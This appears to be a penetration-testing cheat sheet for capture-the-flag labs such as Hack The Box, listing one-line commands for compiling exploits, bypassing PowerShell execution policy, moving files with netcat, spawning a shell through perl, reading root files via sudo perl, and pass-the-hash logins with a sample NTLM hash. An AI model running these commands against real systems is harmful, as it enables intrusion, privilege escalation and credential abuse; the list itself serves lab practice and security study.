MISC

Compiling Exploits

gcc -o exploit exploit.c
#Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Cross compiling
Compile Windows exploit in Linux
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
Compile Python script to executable
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0

Powershell bypass

Powershell: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

Window Exploit Suggester

./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt

Finding Auxiliary

ls /usr/share/nmap/scripts/ | grep smb | grep vuln

Netcat

From attacker to target
At target
nc -lvp 6969 > blah.txt
At attacker (method 1)
nc x.x.x.x 6969 < blah.txt
At attacker (method 2)
cat blah.txt | nc x.x.x.x 6969

Perl Exploit

Perl Exploit
perl —e 'exec "/bin/sh";'
sudo perl -F: -lane 'print $F[0]' /root/root.txt

Awk

Remove duplicate lines:
awk '!seen[$0]++' file

Searchsploit

searchsploit --overflow --exact --mirror 21234
searchsploit --overflow --exact Gwolle

Firewall Rule Enable

firewall rule enable
ufw allow from victimip to any port 80,443 proto tcp

Wordlist Creation

Wordlist creation:
cewl -w cewl-forum.txt -e -a http://forum.bart.htb

PASS the HASH

Pass the hash :
pth-winexe -U jenkins/administrator //ip cmd.exe
pth-winexe -U jenkins/administrator%password //ip cmd.exe
crackmapexec
pth-winexe --user=jeeves/administrator%aad3b435b51404e eaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe

Share folder Windows to linux

mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other